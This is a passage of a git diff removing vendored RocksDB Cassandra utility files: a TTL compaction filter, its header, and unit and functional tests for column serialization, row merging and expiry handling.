-  bool has_ttl = ExtractTTL(key, value, &ttl, new_value, value_changed);
-  if (has_ttl) {
-    *expiration = now + ttl;
-  }
-  return has_ttl;
-}
-
-}  // namespace blob_db
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.cc
deleted file mode 100644
index e817972..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.cc
+++ /dev/null
@@ -1,47 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "utilities/cassandra/cassandra_compaction_filter.h"
-#include <string>
-#include "rocksdb/slice.h"
-#include "utilities/cassandra/format.h"
-
-
-namespace rocksdb {
-namespace cassandra {
-
-const char* CassandraCompactionFilter::Name() const {
-  return "CassandraCompactionFilter";
-}
-
-CompactionFilter::Decision CassandraCompactionFilter::FilterV2(
-  int level,
-  const Slice& key,
-  ValueType value_type,
-  const Slice& existing_value,
-  std::string* new_value,
-  std::string* skip_until) const {
-
-  bool value_changed = false;
-  RowValue row_value = RowValue::Deserialize(
-    existing_value.data(), existing_value.size());
-  RowValue compacted = purge_ttl_on_expiration_ ?
-    row_value.PurgeTtl(&value_changed) :
-    row_value.ExpireTtl(&value_changed);
-
-  if(compacted.Empty()) {
-    return Decision::kRemove;
-  }
-
-  if (value_changed) {
-    compacted.Serialize(new_value);
-    return Decision::kChangeValue;
-  }
-
-  return Decision::kKeep;
-}
-
-}  // namespace cassandra
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.h b/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.h
deleted file mode 100644
index c09b8e7..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_compaction_filter.h
+++ /dev/null
@@ -1,39 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <string>
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/slice.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-/**
- * Compaction filter for removing expired Cassandra data with ttl.
- * If option `purge_ttl_on_expiration` is set to true, expired data
- * will be directly purged. Otherwise expired data will be converted
- * tombstones first, then be eventally removed after gc grace period. 
- * `purge_ttl_on_expiration` should only be on in the case all the 
- * writes have same ttl setting, otherwise it could bring old data back.
- */
-class CassandraCompactionFilter : public CompactionFilter {
-public:
-  explicit CassandraCompactionFilter(bool purge_ttl_on_expiration)
-    : purge_ttl_on_expiration_(purge_ttl_on_expiration) {}
-
-  const char* Name() const override;
-  virtual Decision FilterV2(int level,
-                            const Slice& key,
-                            ValueType value_type,
-                            const Slice& existing_value,
-                            std::string* new_value,
-                            std::string* skip_until) const override;
-
-private:
-  bool purge_ttl_on_expiration_;
-};
-}  // namespace cassandra
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_format_test.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_format_test.cc
deleted file mode 100644
index 0cf124d..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_format_test.cc
+++ /dev/null
@@ -1,353 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <cstring>
-#include <memory>
-#include "util/testharness.h"
-#include "utilities/cassandra/format.h"
-#include "utilities/cassandra/serialize.h"
-#include "utilities/cassandra/test_utils.h"
-
-using namespace rocksdb::cassandra;
-
-namespace rocksdb {
-namespace cassandra {
-
-TEST(ColumnTest, Column) {
-  char data[4] = {'d', 'a', 't', 'a'};
-  int8_t mask = 0;
-  int8_t index = 1;
-  int64_t timestamp = 1494022807044;
-  Column c = Column(mask, index, timestamp, sizeof(data), data);
-
-  EXPECT_EQ(c.Index(), index);
-  EXPECT_EQ(c.Timestamp(), timestamp);
-  EXPECT_EQ(c.Size(), 14 + sizeof(data));
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(c.Size() * 2);
-  c.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), c.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), mask);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), timestamp);
-  offset += sizeof(int64_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), sizeof(data));
-  offset += sizeof(int32_t);
-  EXPECT_TRUE(std::memcmp(data, dest.c_str() + offset, sizeof(data)) == 0);
-
-  // Verify the deserialization.
-  std::string saved_dest = dest;
-  std::shared_ptr<Column> c1 = Column::Deserialize(saved_dest.c_str(), 0);
-  EXPECT_EQ(c1->Index(), index);
-  EXPECT_EQ(c1->Timestamp(), timestamp);
-  EXPECT_EQ(c1->Size(), 14 + sizeof(data));
-
-  c1->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + c.Size(), c.Size()) == 0);
-
-  // Verify the ColumnBase::Deserialization.
-  saved_dest = dest;
-  std::shared_ptr<ColumnBase> c2 =
-      ColumnBase::Deserialize(saved_dest.c_str(), c.Size());
-  c2->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 3 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str() + c.Size(), dest.c_str() + c.Size() * 2, c.Size())
-      == 0);
-}
-
-TEST(ExpiringColumnTest, ExpiringColumn) {
-  char data[4] = {'d', 'a', 't', 'a'};
-  int8_t mask = ColumnTypeMask::EXPIRATION_MASK;
-  int8_t index = 3;
-  int64_t timestamp = 1494022807044;
-  int32_t ttl = 3600;
-  ExpiringColumn c = ExpiringColumn(mask, index, timestamp,
-                                    sizeof(data), data, ttl);
-
-  EXPECT_EQ(c.Index(), index);
-  EXPECT_EQ(c.Timestamp(), timestamp);
-  EXPECT_EQ(c.Size(), 18 + sizeof(data));
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(c.Size() * 2);
-  c.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), c.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), mask);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), timestamp);
-  offset += sizeof(int64_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), sizeof(data));
-  offset += sizeof(int32_t);
-  EXPECT_TRUE(std::memcmp(data, dest.c_str() + offset, sizeof(data)) == 0);
-  offset += sizeof(data);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), ttl);
-
-  // Verify the deserialization.
-  std::string saved_dest = dest;
-  std::shared_ptr<ExpiringColumn> c1 =
-      ExpiringColumn::Deserialize(saved_dest.c_str(), 0);
-  EXPECT_EQ(c1->Index(), index);
-  EXPECT_EQ(c1->Timestamp(), timestamp);
-  EXPECT_EQ(c1->Size(), 18 + sizeof(data));
-
-  c1->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + c.Size(), c.Size()) == 0);
-
-  // Verify the ColumnBase::Deserialization.
-  saved_dest = dest;
-  std::shared_ptr<ColumnBase> c2 =
-      ColumnBase::Deserialize(saved_dest.c_str(), c.Size());
-  c2->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 3 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str() + c.Size(), dest.c_str() + c.Size() * 2, c.Size())
-      == 0);
-}
-
-TEST(TombstoneTest, Tombstone) {
-  int8_t mask = ColumnTypeMask::DELETION_MASK;
-  int8_t index = 2;
-  int32_t local_deletion_time = 1494022807;
-  int64_t marked_for_delete_at = 1494022807044;
-  Tombstone c = Tombstone(mask, index, local_deletion_time,
-                          marked_for_delete_at);
-
-  EXPECT_EQ(c.Index(), index);
-  EXPECT_EQ(c.Timestamp(), marked_for_delete_at);
-  EXPECT_EQ(c.Size(), 14);
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(c.Size() * 2);
-  c.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), c.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), mask);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), local_deletion_time);
-  offset += sizeof(int32_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), marked_for_delete_at);
-
-  // Verify the deserialization.
-  std::shared_ptr<Tombstone> c1 = Tombstone::Deserialize(dest.c_str(), 0);
-  EXPECT_EQ(c1->Index(), index);
-  EXPECT_EQ(c1->Timestamp(), marked_for_delete_at);
-  EXPECT_EQ(c1->Size(), 14);
-
-  c1->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + c.Size(), c.Size()) == 0);
-
-  // Verify the ColumnBase::Deserialization.
-  std::shared_ptr<ColumnBase> c2 =
-    ColumnBase::Deserialize(dest.c_str(), c.Size());
-  c2->Serialize(&dest);
-  EXPECT_EQ(dest.size(), 3 * c.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str() + c.Size(), dest.c_str() + c.Size() * 2, c.Size())
-      == 0);
-}
-
-TEST(RowValueTest, RowTombstone) {
-  int32_t local_deletion_time = 1494022807;
-  int64_t marked_for_delete_at = 1494022807044;
-  RowValue r = RowValue(local_deletion_time, marked_for_delete_at);
-
-  EXPECT_EQ(r.Size(), 12);
-  EXPECT_EQ(r.IsTombstone(), true);
-  EXPECT_EQ(r.LastModifiedTime(), marked_for_delete_at);
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(r.Size() * 2);
-  r.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), r.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), local_deletion_time);
-  offset += sizeof(int32_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), marked_for_delete_at);
-
-  // Verify the deserialization.
-  RowValue r1 = RowValue::Deserialize(dest.c_str(), r.Size());
-  EXPECT_EQ(r1.Size(), 12);
-  EXPECT_EQ(r1.IsTombstone(), true);
-  EXPECT_EQ(r1.LastModifiedTime(), marked_for_delete_at);
-
-  r1.Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * r.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + r.Size(), r.Size()) == 0);
-}
-
-TEST(RowValueTest, RowWithColumns) {
-  std::vector<std::shared_ptr<ColumnBase>> columns;
-  int64_t last_modified_time = 1494022807048;
-  std::size_t columns_data_size = 0;
-
-  char e_data[5] = {'e', 'd', 'a', 't', 'a'};
-  int8_t e_index = 0;
-  int64_t e_timestamp = 1494022807044;
-  int32_t e_ttl = 3600;
-  columns.push_back(std::shared_ptr<ExpiringColumn>(
-    new ExpiringColumn(ColumnTypeMask::EXPIRATION_MASK, e_index,
-      e_timestamp, sizeof(e_data), e_data, e_ttl)));
-  columns_data_size += columns[0]->Size();
-
-  char c_data[4] = {'d', 'a', 't', 'a'};
-  int8_t c_index = 1;
-  int64_t c_timestamp = 1494022807048;
-  columns.push_back(std::shared_ptr<Column>(
-    new Column(0, c_index, c_timestamp, sizeof(c_data), c_data)));
-  columns_data_size += columns[1]->Size();
-
-  int8_t t_index = 2;
-  int32_t t_local_deletion_time = 1494022801;
-  int64_t t_marked_for_delete_at = 1494022807043;
-  columns.push_back(std::shared_ptr<Tombstone>(
-    new Tombstone(ColumnTypeMask::DELETION_MASK,
-      t_index, t_local_deletion_time, t_marked_for_delete_at)));
-  columns_data_size += columns[2]->Size();
-
-  RowValue r = RowValue(std::move(columns), last_modified_time);
-
-  EXPECT_EQ(r.Size(), columns_data_size + 12);
-  EXPECT_EQ(r.IsTombstone(), false);
-  EXPECT_EQ(r.LastModifiedTime(), last_modified_time);
-
-  // Verify the serialization.
-  std::string dest;
-  dest.reserve(r.Size() * 2);
-  r.Serialize(&dest);
-
-  EXPECT_EQ(dest.size(), r.Size());
-  std::size_t offset = 0;
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset),
-    std::numeric_limits<int32_t>::max());
-  offset += sizeof(int32_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset),
-    std::numeric_limits<int64_t>::min());
-  offset += sizeof(int64_t);
-
-  // Column0: ExpiringColumn
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset),
-    ColumnTypeMask::EXPIRATION_MASK);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), e_index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), e_timestamp);
-  offset += sizeof(int64_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), sizeof(e_data));
-  offset += sizeof(int32_t);
-  EXPECT_TRUE(std::memcmp(e_data, dest.c_str() + offset, sizeof(e_data)) == 0);
-  offset += sizeof(e_data);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), e_ttl);
-  offset += sizeof(int32_t);
-
-  // Column1: Column
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), 0);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), c_index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), c_timestamp);
-  offset += sizeof(int64_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), sizeof(c_data));
-  offset += sizeof(int32_t);
-  EXPECT_TRUE(std::memcmp(c_data, dest.c_str() + offset, sizeof(c_data)) == 0);
-  offset += sizeof(c_data);
-
-  // Column2: Tombstone
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset),
-    ColumnTypeMask::DELETION_MASK);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int8_t>(dest.c_str(), offset), t_index);
-  offset += sizeof(int8_t);
-  EXPECT_EQ(Deserialize<int32_t>(dest.c_str(), offset), t_local_deletion_time);
-  offset += sizeof(int32_t);
-  EXPECT_EQ(Deserialize<int64_t>(dest.c_str(), offset), t_marked_for_delete_at);
-
-  // Verify the deserialization.
-  RowValue r1 = RowValue::Deserialize(dest.c_str(), r.Size());
-  EXPECT_EQ(r1.Size(), columns_data_size + 12);
-  EXPECT_EQ(r1.IsTombstone(), false);
-  EXPECT_EQ(r1.LastModifiedTime(), last_modified_time);
-
-  r1.Serialize(&dest);
-  EXPECT_EQ(dest.size(), 2 * r.Size());
-  EXPECT_TRUE(
-    std::memcmp(dest.c_str(), dest.c_str() + r.Size(), r.Size()) == 0);
-}
-
-TEST(RowValueTest, PurgeTtlShouldRemvoeAllColumnsExpired) {
-  int64_t now = time(nullptr);
-
-  auto row_value = CreateTestRowValue({
-    std::make_tuple(kColumn, 0, ToMicroSeconds(now)),
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 10)), //expired
-    std::make_tuple(kExpiringColumn, 2, ToMicroSeconds(now)), // not expired
-    std::make_tuple(kTombstone, 3, ToMicroSeconds(now))
-  });
-
-  bool changed = false;
-  auto purged = row_value.PurgeTtl(&changed);
-  EXPECT_TRUE(changed);
-  EXPECT_EQ(purged.columns_.size(), 3);
-  VerifyRowValueColumns(purged.columns_, 0, kColumn, 0, ToMicroSeconds(now));
-  VerifyRowValueColumns(purged.columns_, 1, kExpiringColumn, 2, ToMicroSeconds(now));
-  VerifyRowValueColumns(purged.columns_, 2, kTombstone, 3, ToMicroSeconds(now));
-
-  purged.PurgeTtl(&changed);
-  EXPECT_FALSE(changed);
-}
-
-TEST(RowValueTest, ExpireTtlShouldConvertExpiredColumnsToTombstones) {
-  int64_t now = time(nullptr);
-
-  auto row_value = CreateTestRowValue({
-    std::make_tuple(kColumn, 0, ToMicroSeconds(now)),
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 10)), //expired
-    std::make_tuple(kExpiringColumn, 2, ToMicroSeconds(now)), // not expired
-    std::make_tuple(kTombstone, 3, ToMicroSeconds(now))
-  });
-
-  bool changed = false;
-  auto compacted = row_value.ExpireTtl(&changed);
-  EXPECT_TRUE(changed);
-  EXPECT_EQ(compacted.columns_.size(), 4);
-  VerifyRowValueColumns(compacted.columns_, 0, kColumn, 0, ToMicroSeconds(now));
-  VerifyRowValueColumns(compacted.columns_, 1, kTombstone, 1, ToMicroSeconds(now - 10));
-  VerifyRowValueColumns(compacted.columns_, 2, kExpiringColumn, 2, ToMicroSeconds(now));
-  VerifyRowValueColumns(compacted.columns_, 3, kTombstone, 3, ToMicroSeconds(now));
-
-  compacted.ExpireTtl(&changed);
-  EXPECT_FALSE(changed);
-}
-} // namespace cassandra
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_functional_test.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_functional_test.cc
deleted file mode 100644
index 0c02228..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_functional_test.cc
+++ /dev/null
@@ -1,251 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <iostream>
-#include "rocksdb/db.h"
-#include "db/db_impl.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/utilities/db_ttl.h"
-#include "util/testharness.h"
-#include "util/random.h"
-#include "utilities/merge_operators.h"
-#include "utilities/cassandra/cassandra_compaction_filter.h"
-#include "utilities/cassandra/merge_operator.h"
-#include "utilities/cassandra/test_utils.h"
-
-using namespace rocksdb;
-
-namespace rocksdb {
-namespace cassandra {
-
-// Path to the database on file system
-const std::string kDbName = test::TmpDir() + "/cassandra_functional_test";
-
-class CassandraStore {
- public:
-  explicit CassandraStore(std::shared_ptr<DB> db)
-      : db_(db),
-        merge_option_(),
-        get_option_() {
-    assert(db);
-  }
-
-  bool Append(const std::string& key, const RowValue& val){
-    std::string result;
-    val.Serialize(&result);
-    Slice valSlice(result.data(), result.size());
-    auto s = db_->Merge(merge_option_, key, valSlice);
-
-    if (s.ok()) {
-      return true;
-    } else {
-      std::cerr << "ERROR " << s.ToString() << std::endl;
-      return false;
-    }
-  }
-
-  void Flush() {
-    dbfull()->TEST_FlushMemTable();
-    dbfull()->TEST_WaitForCompact();
-  }
-
-  void Compact() {
-    dbfull()->TEST_CompactRange(
-      0, nullptr, nullptr, db_->DefaultColumnFamily());
-  }
-
-  std::tuple<bool, RowValue> Get(const std::string& key){
-    std::string result;
-    auto s = db_->Get(get_option_, key, &result);
-
-    if (s.ok()) {
-      return std::make_tuple(true,
-                             RowValue::Deserialize(result.data(),
-                                                   result.size()));
-    }
-
-    if (!s.IsNotFound()) {
-      std::cerr << "ERROR " << s.ToString() << std::endl;
-    }
-
-    return std::make_tuple(false, RowValue(0, 0));
-  }
-
- private:
-  std::shared_ptr<DB> db_;
-  WriteOptions merge_option_;
-  ReadOptions get_option_;
-
-  DBImpl* dbfull() { return reinterpret_cast<DBImpl*>(db_.get()); }
-
-};
-
-class TestCompactionFilterFactory : public CompactionFilterFactory {
-public:
-  explicit TestCompactionFilterFactory(bool purge_ttl_on_expiration)
-    : purge_ttl_on_expiration_(purge_ttl_on_expiration) {}
-
-  virtual std::unique_ptr<CompactionFilter> CreateCompactionFilter(
-      const CompactionFilter::Context& context) override {
-    return unique_ptr<CompactionFilter>(new CassandraCompactionFilter(purge_ttl_on_expiration_));
-  }
-
-  virtual const char* Name() const override {
-    return "TestCompactionFilterFactory";
-  }
-
-private:
-  bool purge_ttl_on_expiration_;
-};
-
-
-// The class for unit-testing
-class CassandraFunctionalTest : public testing::Test {
-public:
-  CassandraFunctionalTest() {
-    DestroyDB(kDbName, Options());    // Start each test with a fresh DB
-  }
-
-  std::shared_ptr<DB> OpenDb() {
-    DB* db;
-    Options options;
-    options.create_if_missing = true;
-    options.merge_operator.reset(new CassandraValueMergeOperator());
-    auto* cf_factory = new TestCompactionFilterFactory(purge_ttl_on_expiration_);
-    options.compaction_filter_factory.reset(cf_factory);
-    EXPECT_OK(DB::Open(options, kDbName, &db));
-    return std::shared_ptr<DB>(db);
-  }
-
-  bool purge_ttl_on_expiration_ = false;
-};
-
-// THE TEST CASES BEGIN HERE
-
-TEST_F(CassandraFunctionalTest, SimpleMergeTest) {
-  CassandraStore store(OpenDb());
-
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kTombstone, 0, 5),
-    std::make_tuple(kColumn, 1, 8),
-    std::make_tuple(kExpiringColumn, 2, 5),
-  }));
-  store.Append("k1",CreateTestRowValue({
-    std::make_tuple(kColumn, 0, 2),
-    std::make_tuple(kExpiringColumn, 1, 5),
-    std::make_tuple(kTombstone, 2, 7),
-    std::make_tuple(kExpiringColumn, 7, 17),
-  }));
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, 6),
-    std::make_tuple(kTombstone, 1, 5),
-    std::make_tuple(kColumn, 2, 4),
-    std::make_tuple(kTombstone, 11, 11),
-  }));
-
-  auto ret = store.Get("k1");
-
-  ASSERT_TRUE(std::get<0>(ret));
-  RowValue& merged = std::get<1>(ret);
-  EXPECT_EQ(merged.columns_.size(), 5);
-  VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 0, 6);
-  VerifyRowValueColumns(merged.columns_, 1, kColumn, 1, 8);
-  VerifyRowValueColumns(merged.columns_, 2, kTombstone, 2, 7);
-  VerifyRowValueColumns(merged.columns_, 3, kExpiringColumn, 7, 17);
-  VerifyRowValueColumns(merged.columns_, 4, kTombstone, 11, 11);
-}
-
-TEST_F(CassandraFunctionalTest,
-       CompactionShouldConvertExpiredColumnsToTombstone) {
-  CassandraStore store(OpenDb());
-  int64_t now= time(nullptr);
-
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), //expired
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl + 10)), // not expired
-    std::make_tuple(kTombstone, 3, ToMicroSeconds(now))
-  }));
-
-  store.Flush();
-
-  store.Append("k1",CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), //expired
-    std::make_tuple(kColumn, 2, ToMicroSeconds(now))
-  }));
-
-  store.Flush();
-  store.Compact();
-
-  auto ret = store.Get("k1");
-  ASSERT_TRUE(std::get<0>(ret));
-  RowValue& merged = std::get<1>(ret);
-  EXPECT_EQ(merged.columns_.size(), 4);
-  VerifyRowValueColumns(merged.columns_, 0, kTombstone, 0, ToMicroSeconds(now - 10));
-  VerifyRowValueColumns(merged.columns_, 1, kExpiringColumn, 1, ToMicroSeconds(now - kTtl + 10));
-  VerifyRowValueColumns(merged.columns_, 2, kColumn, 2, ToMicroSeconds(now));
-  VerifyRowValueColumns(merged.columns_, 3, kTombstone, 3, ToMicroSeconds(now));
-}
-
-
-TEST_F(CassandraFunctionalTest,
-       CompactionShouldPurgeExpiredColumnsIfPurgeTtlIsOn) {
-  purge_ttl_on_expiration_ = true;
-  CassandraStore store(OpenDb());
-  int64_t now = time(nullptr);
-
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)), //expired
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now)), // not expired
-    std::make_tuple(kTombstone, 3, ToMicroSeconds(now))
-  }));
-
-  store.Flush();
-
-  store.Append("k1",CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)), //expired
-    std::make_tuple(kColumn, 2, ToMicroSeconds(now))
-  }));
-
-  store.Flush();
-  store.Compact();
-
-  auto ret = store.Get("k1");
-  ASSERT_TRUE(std::get<0>(ret));
-  RowValue& merged = std::get<1>(ret);
-  EXPECT_EQ(merged.columns_.size(), 3);
-  VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 1, ToMicroSeconds(now));
-  VerifyRowValueColumns(merged.columns_, 1, kColumn, 2, ToMicroSeconds(now));
-  VerifyRowValueColumns(merged.columns_, 2, kTombstone, 3, ToMicroSeconds(now));
-}
-
-TEST_F(CassandraFunctionalTest,
-       CompactionShouldRemoveRowWhenAllColumnsExpiredIfPurgeTtlIsOn) {
-  purge_ttl_on_expiration_ = true;
-  CassandraStore store(OpenDb());
-  int64_t now = time(nullptr);
-
-  store.Append("k1", CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 20)),
-    std::make_tuple(kExpiringColumn, 1, ToMicroSeconds(now - kTtl - 20)),
-  }));
-
-  store.Flush();
-
-  store.Append("k1",CreateTestRowValue({
-    std::make_tuple(kExpiringColumn, 0, ToMicroSeconds(now - kTtl - 10)),
-  }));
-
-  store.Flush();
-  store.Compact();
-  ASSERT_FALSE(std::get<0>(store.Get("k1")));
-}
-
-} // namespace cassandra
-} // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/utilities/cassandra/cassandra_row_merge_test.cc b/thirdparty/rocksdb/utilities/cassandra/cassandra_row_merge_test.cc
deleted file mode 100644
index 78c7d8e..0000000
--- a/thirdparty/rocksdb/utilities/cassandra/cassandra_row_merge_test.cc
+++ /dev/null
@@ -1,112 +0,0 @@
-// Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include <memory>
-#include "util/testharness.h"
-#include "utilities/cassandra/format.h"
-#include "utilities/cassandra/test_utils.h"
-
-namespace rocksdb {
-namespace cassandra {
-
-TEST(RowValueMergeTest, Merge) {
-  std::vector<RowValue> row_values;
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kTombstone, 0, 5),
-      std::make_tuple(kColumn, 1, 8),
-      std::make_tuple(kExpiringColumn, 2, 5),
-    })
-  );
-
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kColumn, 0, 2),
-      std::make_tuple(kExpiringColumn, 1, 5),
-      std::make_tuple(kTombstone, 2, 7),
-      std::make_tuple(kExpiringColumn, 7, 17),
-    })
-  );
-
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kExpiringColumn, 0, 6),
-      std::make_tuple(kTombstone, 1, 5),
-      std::make_tuple(kColumn, 2, 4),
-      std::make_tuple(kTombstone, 11, 11),
-    })
-  );
-
-  RowValue merged = RowValue::Merge(std::move(row_values));
-  EXPECT_FALSE(merged.IsTombstone());
-  EXPECT_EQ(merged.columns_.size(), 5);
-  VerifyRowValueColumns(merged.columns_, 0, kExpiringColumn, 0, 6);
-  VerifyRowValueColumns(merged.columns_, 1, kColumn, 1, 8);
-  VerifyRowValueColumns(merged.columns_, 2, kTombstone, 2, 7);
-  VerifyRowValueColumns(merged.columns_, 3, kExpiringColumn, 7, 17);
-  VerifyRowValueColumns(merged.columns_, 4, kTombstone, 11, 11);
-}
-
-TEST(RowValueMergeTest, MergeWithRowTombstone) {
-  std::vector<RowValue> row_values;
-
-  // A row tombstone.
-  row_values.push_back(
-    CreateRowTombstone(11)
-  );
-
-  // This row's timestamp is smaller than tombstone.
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kColumn, 0, 5),
-      std::make_tuple(kColumn, 1, 6),
-    })
-  );
-
-  // Some of the column's row is smaller, some is larger.
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kColumn, 2, 10),
-      std::make_tuple(kColumn, 3, 12),
-    })
-  );
-
-  // All of the column's rows are larger than tombstone.
-  row_values.push_back(
-    CreateTestRowValue({
-      std::make_tuple(kColumn, 4, 13),
-      std::make_tuple(kColumn, 5, 14),
-    })
-  );
-
-  RowValue merged = RowValue::Merge(std::move(row_values));
-  EXPECT_FALSE(merged.IsTombstone());
-  EXPECT_EQ(merged.columns_.size(), 3);
-  VerifyRowValueColumns(merged.columns_, 0, kColumn, 3, 12);
-  VerifyRowValueColumns(merged.columns_, 1, kColumn, 4, 13);
-  VerifyRowValueColumns(merged.columns_, 2, kColumn, 5, 14);
-
-  // If the tombstone's timestamp is the latest, then it returns a
-  // row tombstone.
-  row_values.push_back(
-    CreateRowTombstone(15)
-  );
